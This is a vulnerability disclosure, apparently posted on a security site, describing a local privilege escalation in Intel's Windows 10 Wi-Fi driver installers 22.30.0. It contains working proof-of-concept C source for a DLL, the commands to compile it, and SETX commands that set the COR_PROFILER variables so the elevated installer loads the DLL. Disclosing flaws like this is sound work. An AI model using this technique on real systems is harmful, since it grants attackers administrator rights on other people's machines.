Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation

2021.04.27
Credit: Stefan Kanthak
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

Hi @ll, the executable installers version 22.30.0 (Latest), published 2/23/2021, for the "Windows 10 Wi-Fi Drivers for Intel Wireless Adapters", <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe> and <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>, available from <https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters> are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH local escalation of privilege. CVSS 3.0 score: 8.2 (High) CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H Demonstration: ~~~~~~~~~~~~~~ 0. Log on with an arbitrary user account. 1. Save the following source as poc.c in an arbitrary directory: --- poc.c --- // Copyright (C) 2004-2021, Stefan Kanthak <stefan.kanthak@nexgo.de> #define STRICT #define UNICODE #define WIN32_LEAN_AND_MEAN #include <windows.h> const STARTUPINFO si = {sizeof(si)}; __declspec(safebuffers) BOOL WINAPI _DllMainCRTStartup(HANDLE hModule, DWORD dwReason, CONTEXT *lpContext) { WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL"; PROCESS_INFORMATION pi; #if 0 if (dwReason != DLL_PROCESS_ATTACH) return FALSE; #endif if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE, CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &si, &pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } return TRUE; } --- EOF --- 2. Start the command prompt of the 32-bit Windows Software Development Kit, then run the following command lines to compile poc.c and link it as poc.dll: CL.exe /Zl /W4 /Ox /GAFy /c poc.c LINK.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /OPT:REF /RELEASE /SUBSYSTEM:Windows poc.obj kernel32.lib ALTERNATIVE for steps 1 and 2: 2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL> and save it as poc.dll in an arbitrary directory. See <https://skanthak.homepage.t-online.de/sentinel.html> for its documentation, and <https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html> for an example how to use it. 3. Logon with the user account created during Windows setup. 4. Download <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe> and <https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe> and save them in an arbitrary directory. 5. Start a command prompt (UNELEVATED!) and run the following command lines (replace <directory> with the pathname of the directory where you built or saved poc.dll): SETX.exe COR_ENABLE_PROFILING 1 SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A} SETX.exe COR_PROFILER_PATH <directory>\poc.dll JFTR: this is just one method to set these environment variables without the need to elevate! 6. Execute WiFi_22.30.0_Driver32_Win10.exe and WiFi_22.30.0_Driver64_Win10.exe per double-click, acknowledge the UAC prompt, then admire the console windows showing the output of WHOAMI.exe running elevated. stay tuned, and far away from Intel's vulnerable crap! Stefan Kanthak


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top